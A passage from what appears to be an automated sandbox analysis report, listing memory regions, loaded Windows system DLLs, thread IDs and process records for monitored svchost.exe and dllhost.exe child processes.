pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 37978 start_va = 0x90000 end_va = 0xacfff entry_point = 0x90000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37979 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37980 start_va = 0x763d0000 end_va = 0x7649bfff entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 37981 start_va = 0x350000 end_va = 0x450fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 37982 start_va = 0x460000 end_va = 0x4dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 37983 start_va = 0x90000 end_va = 0x96fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 37984 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 37985 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0xc0000 region_type = mapped_file name = "audiodg.exe.mui" filename = "\\Windows\\System32\\en-US\\audiodg.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\audiodg.exe.mui") Region: id = 37986 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 37987 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 37988 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file 
name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 37989 start_va = 0x4e0000 end_va = 0x53bfff entry_point = 0x4e0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 37990 start_va = 0x4e0000 end_va = 0x53bfff entry_point = 0x4e0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 37991 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 37992 start_va = 0x5f0000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 37993 start_va = 0x75c40000 end_va = 0x75c4dfff entry_point = 0x75c40000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 37994 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 37999 start_va = 0x75060000 end_va = 0x75080fff entry_point = 0x75060000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 38000 start_va = 0x77730000 end_va = 0x77774fff entry_point = 0x77730000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 38003 start_va = 0x660000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 38004 start_va = 0x7ffdd000 end_va = 
0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 38008 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 38009 start_va = 0x760d0000 end_va = 0x76152fff entry_point = 0x760d0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 38010 start_va = 0x75740000 end_va = 0x75755fff entry_point = 0x75740000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 38011 start_va = 0x4e0000 end_va = 0x51bfff entry_point = 0x4e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38012 start_va = 0x4e0000 end_va = 0x51bfff entry_point = 0x4e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38013 start_va = 0x4e0000 end_va = 0x51bfff entry_point = 0x4e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38014 start_va = 0x4e0000 end_va = 0x51bfff entry_point = 0x4e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38015 start_va = 0x4e0000 end_va = 0x51bfff entry_point = 0x4e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38016 start_va = 0x754e0000 end_va = 0x7551afff entry_point = 0x754e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" 
(normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38017 start_va = 0x6f0000 end_va = 0x9befff entry_point = 0x6f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 38018 start_va = 0x560000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 38019 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 38020 start_va = 0x5b0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 38021 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Thread: id = 1165 os_tid = 0x39c Thread: id = 1166 os_tid = 0x3a0 Thread: id = 1168 os_tid = 0x3a8 Thread: id = 1170 os_tid = 0x3b0 Thread: id = 1171 os_tid = 0x3b4 Process: id = "677" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7f1d1200" os_pid = "0x3f0" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "667" os_parent_pid = "0x1c0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT 
SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d2a1" [0xc000000f], "LOCAL" [0x7] Region: id = 38116 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 38117 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 38118 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 38119 start_va = 0xbd0000 end_va = 0xbd7fff entry_point = 0xbd0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 38120 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 38121 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 38122 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 38123 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 38124 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 38125 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 38135 start_va = 0xf0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = 
"private_0x00000000000f0000" filename = "" Region: id = 38136 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 38137 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 38138 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 38139 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 38140 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 38141 start_va = 0x1c0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 38142 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 38143 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 38144 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 38145 start_va = 0x50000 end_va = 0x7ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000050000" filename = "" Region: id = 38146 start_va = 0x76270000 end_va = 0x763cbfff entry_point = 0x76270000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 38147 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 38148 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 38149 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 38150 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 38151 start_va = 0x2c0000 end_va = 0x387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 38152 start_va = 0x50000 end_va = 0x6cfff entry_point = 0x50000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 38153 start_va = 0x70000 end_va = 0x7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 38154 start_va = 0x50000 end_va = 0x6cfff entry_point = 0x50000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 38155 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = 
mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 38156 start_va = 0x763d0000 end_va = 0x7649bfff entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 38157 start_va = 0x390000 end_va = 0x490fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 38158 start_va = 0x4a0000 end_va = 0x51ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 38159 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 38160 start_va = 0x50000 end_va = 0x51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 38161 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 38162 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 38163 start_va = 0x160000 end_va = 0x1bbfff entry_point = 0x160000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 38164 start_va = 0x520000 end_va = 0x912fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 38165 start_va = 0x160000 end_va = 0x1bbfff entry_point = 0x160000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 38166 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = 
"\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 38167 start_va = 0xa30000 end_va = 0xa6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 38168 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 38169 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 38179 start_va = 0x970000 end_va = 0x9affff entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 38180 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 38181 start_va = 0xaf0000 end_va = 0xb2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 38182 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 38185 start_va = 0xa90000 end_va = 0xacffff entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 38186 start_va = 0xbe0000 end_va = 0xeaefff entry_point = 0xbe0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 38187 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 38188 start_va = 0x73ee0000 end_va = 0x73f26fff entry_point = 0x73ee0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") 
Region: id = 38189 start_va = 0x77a70000 end_va = 0x77afefff entry_point = 0x77a70000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 38190 start_va = 0x75740000 end_va = 0x75755fff entry_point = 0x75740000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 38191 start_va = 0x160000 end_va = 0x19bfff entry_point = 0x160000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38192 start_va = 0x160000 end_va = 0x19bfff entry_point = 0x160000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38193 start_va = 0x160000 end_va = 0x19bfff entry_point = 0x160000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38194 start_va = 0x160000 end_va = 0x19bfff entry_point = 0x160000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38195 start_va = 0x160000 end_va = 0x19bfff entry_point = 0x160000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38196 start_va = 0x754e0000 end_va = 0x7551afff entry_point = 0x754e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38197 start_va = 0x75c40000 end_va = 0x75c4dfff entry_point = 0x75c40000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: 
"c:\\windows\\system32\\rpcrtremote.dll") Region: id = 38396 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 38397 start_va = 0xf40000 end_va = 0xf7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 38398 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 38399 start_va = 0x760d0000 end_va = 0x76152fff entry_point = 0x760d0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 38428 start_va = 0xfb0000 end_va = 0xfeffff entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 38429 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 38434 start_va = 0x9b0000 end_va = 0xa2ffff entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Thread: id = 1186 os_tid = 0x3f4 Thread: id = 1187 os_tid = 0x3f8 Thread: id = 1190 os_tid = 0x404 Thread: id = 1193 os_tid = 0x410 Thread: id = 1194 os_tid = 0x414 Thread: id = 1198 os_tid = 0x424 Thread: id = 1202 os_tid = 0x434 Thread: id = 1231 os_tid = 0x4bc Process: id = "678" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x7f1d1220" os_pid = "0x440" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "670" os_parent_pid = "0x23c" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT 
AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c468" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 38442 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 38443 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 38444 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 38445 start_va = 0x9c0000 end_va = 0x9c4fff entry_point = 0x9c0000 region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe") Region: id = 38446 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 38447 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") 
Region: id = 38448 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 38449 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 38450 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 38451 start_va = 0x40000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x0000000000040000" filename = "" Region: id = 38452 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 38453 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 38454 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 38455 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 38456 start_va = 0x40000 end_va = 0xa6fff entry_point = 0x40000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 38457 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 38458 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 
38459 start_va = 0x76270000 end_va = 0x763cbfff entry_point = 0x76270000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 38460 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 38461 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 38462 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 38463 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 38464 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 38465 start_va = 0x230000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 38466 start_va = 0xb0000 end_va = 0xccfff entry_point = 0xb0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 38467 start_va = 0x280000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 38468 start_va = 0xb0000 end_va = 0xccfff entry_point = 0xb0000 region_type = mapped_file name = "imm32.dll" filename = 
"\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 38469 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 38470 start_va = 0x763d0000 end_va = 0x7649bfff entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 38471 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 38472 start_va = 0xb0000 end_va = 0xb0fff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 38473 start_va = 0x350000 end_va = 0x450fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 38474 start_va = 0x460000 end_va = 0x4dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 38475 start_va = 0x4e0000 end_va = 0x53bfff entry_point = 0x4e0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 38476 start_va = 0x4e0000 end_va = 0x53bfff entry_point = 0x4e0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 38477 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 38478 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = 